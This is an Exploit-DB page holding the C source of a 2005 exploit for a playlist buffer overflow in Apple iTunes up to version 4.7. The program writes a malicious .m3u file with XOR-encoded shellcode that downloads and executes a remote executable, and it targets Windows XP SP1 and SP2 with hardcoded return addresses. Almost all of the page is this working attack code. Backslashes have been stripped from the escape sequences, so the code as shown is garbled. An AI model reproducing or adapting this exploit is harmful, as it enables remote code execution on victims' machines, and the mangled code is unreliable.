https://www.exploit-db.com/exploits/759

漏洞细节尚未披露

/*
*
* Apple iTunes Playlist Buffer Overflow Download Shellcoded Exploit
* Bug discoveried by iDEFENSE Security  (http://www.idefense.com)
* Exploit coded By ATmaCA
* Copyright ©2002-2005 AtmacaSoft Inc. All Rights Reserved.
* Web: http://www.atmacasoft.com
* E-Mail: [email protected]
* Credit to xT and delikon
* Usage:exploit <Target> <OutputPath> <Url>
* Targets:
* 1 - WinXP SP1 english - kernel32.dll push eax - ret [0x77E6532A]
* 2 - WinXP SP2 english - kernel32.dll push eax - ret [0x7C80BCB0]
* Example:exploit 1 vuln.m3u http://www.atmacasoft.com/exp/msg.exe
*
*/

/*
*
* Up to iTunes version 4.7 are affected
* Tested with iTunes v4.7 on WinXp Sp2 english platform
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <conio.h>
#include <string.h>


#ifdef __BORLANDC__
        #include <mem.h>
#endif

#define NOP 0x90

/* (*.m3u) playlist header */
char m3u_playlist_header[] = "http://";

/* Generic win32 http download shellcode
   xored with 0x1d by delikon (http://delikon.de/) */
char shellcode[] = "xEB"
"x10x58x31xC9x66x81xE9x22xFFx80x30x1Dx40xE2xFAxEBx05xE8xEBxFF"
"xFFxFFxF4xD1x1Dx1Dx1Dx42xF5x4Bx1Dx1Dx1Dx94xDEx4Dx75x93x53x13"
"xF1xF5x7Dx1Dx1Dx1Dx2CxD4x7BxA4x72x73x4Cx75x68x6Fx71x70x49xE2"
"xCDx4Dx75x2Bx07x32x6DxF5x5Bx1Dx1Dx1Dx2CxD4x4Cx4Cx90x2Ax4Bx90"
"x6Ax15x4Bx4CxE2xCDx4Ex75x85xE3x97x13xF5x30x1Dx1Dx1Dx4Cx4AxE2"
"xCDx2CxD4x54xFFxE3x4Ex75x63xC5xFFx6ExF5x04x1Dx1Dx1DxE2xCDx48"
"x4Bx79xBCx2Dx1Dx1Dx1Dx96x5Dx11x96x6Dx01xB0x96x75x15x94xF5x43"
"x40xDEx4Ex48x4Bx4Ax96x71x39x05x96x58x21x96x49x18x65x1CxF7x96"
"x57x05x96x47x3Dx1CxF6xFEx28x54x96x29x96x1CxF3x2CxE2xE1x2CxDD"
"xB1x25xFDx69x1AxDCxD2x10x1CxDAxF6xEFx26x61x39x09x68xFCx96x47"
"x39x1CxF6x7Bx96x11x56x96x47x01x1CxF6x96x19x96x1CxF5xF4x1Fx1D"
"x1Dx1Dx2CxDDx94xF7x42x43x40x46xDExF5x32xE2xE2xE2x70x75x75x33"
"x78x65x78x1D";

char *target[]=  //return addr - EIP
{
        "x2Ax53xE6x77",   //push eax - kernel32.dll - WinXP Sp1 english
        "xB0xBCx80x7C"    //push eax - kernel32.dll - WinXP Sp2 english
};

FILE           *di;
int            targetnum;
int            i = 0;
short int      weblength;

char           *web;

char           *pointer = NULL;
char           *newshellcode;

/*xor cryptor*/
char *Sifrele(char *Name1)
{
        char *Name=Name1;
        char xor=0x1d;
        int Size=strlen(Name);
        for(i=0;i<Size;i++)
                Name[i]=Name[i]^xor;
        return Name;
}


void main(int argc, char *argv[])
{

        if (argc < 4)
        {
                printf("Apple iTunes Playlist Buffer Overflow Download Shellcoded Exploitn");
                printf("Bug discoveried by iDEFENSE Security  (http://www.idefense.com)n");
                printf("Exploit coded By ATmaCAn");
                printf("Copyright ©2002-2005 AtmacaSoft Inc. All Rights Reserved.n");
                printf("Web: http://www.atmacasoft.comn");
                printf("E-Mail: [email protected]");
                printf("Credit to xT and delikonnn");
                printf("tUsage:exploit <Target> <OutputPath> <Url>n");
                printf("tTargets:n");
                printf("t1 - WinXP SP1 english - kernel32.dll push eax - ret [0x77E6532A]n");
                printf("t2 - WinXP SP2 english - kernel32.dll push eax - ret [0x7C80BCB0]n");
                printf("tExample:exploit 1 vuln.m3u http://www.atmacasoft.com/exp/msg.exen");

                return;
        }


        targetnum = atoi(argv[1]) - 1;
	web = argv[3];

        if( (di=fopen(argv[2],"wb")) == NULL )
        {
                printf("Error opening file!n");
                return;
        }
        for(i=0;i<sizeof(m3u_playlist_header)-1;i++)
                fputc(m3u_playlist_header[i],di);

        /*stuff in a couple of NOPs*/
        for(i=0;i<3045;i++)
                fputc(NOP,di);

	/*Overwriting the return address (EIP) with push eax address*/
        /*located somewhere in process space*/
        fprintf(di,"%s",target[targetnum]); // - ret

        for(i=0;i<50;i++) //NOPs
                fputc(NOP,di);


        weblength=(short int)0xff22;
        pointer=strstr(shellcode,"x22xff");
	weblength-=strlen(web)+1;
        memcpy(pointer,&weblength,2);
        newshellcode = new char[sizeof(shellcode)+strlen(web)+1];
        strcpy(newshellcode,shellcode);
        strcat(newshellcode,Sifrele(web));
        strcat(newshellcode,"x1d");


        for(i=0;i<strlen(newshellcode);i++)
                fputc(newshellcode[i],di);

        //for(i=0;i<50;i++) //NOPs
                //fputc(NOP,di);

        printf("Vulnarable m3u file %s has been generated!n",argv[2]);

        fclose(di);
}

// milw0rm.com [2005-01-16]